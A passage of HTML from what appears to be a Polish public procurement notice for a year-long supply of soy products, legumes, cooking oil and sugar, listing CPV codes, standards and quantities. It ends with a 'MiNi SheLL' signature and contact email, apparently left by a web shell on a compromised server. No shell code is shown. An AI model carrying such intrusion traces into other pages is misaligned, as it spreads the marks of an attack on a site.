PN-ISO 5506
150;
2
Soja granulat opak. do 30 kg
15890000-3
PN-ISO 5506
120;
3
Soja kostka opak. do 30 kg
15890000-3
PN-ISO 5506
200;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.89.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Cześć 7 - Rośliny strączkowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1
Fasola Jaś drobna opak. do 50 kg
03221210-1
PN-75/R65031
450;
2
Fasola Jaś gruba opak. do 50 kg
03221210-1 
PN-75/R65031
800;
3
Groch łuskany opak. do 50 kg
03221220-4
PN-81/R65032
700;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.22.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Cześć 8 - Olej spożywczy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1
Olej spożywczy opak. do 10 l
15411100-3
PN-A-86901
1600;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.40.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Cześć 9 - Cukier.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1
Cukier opak. do 50 kg
15831200-4
PN-A-74850
4300;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.83.12.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com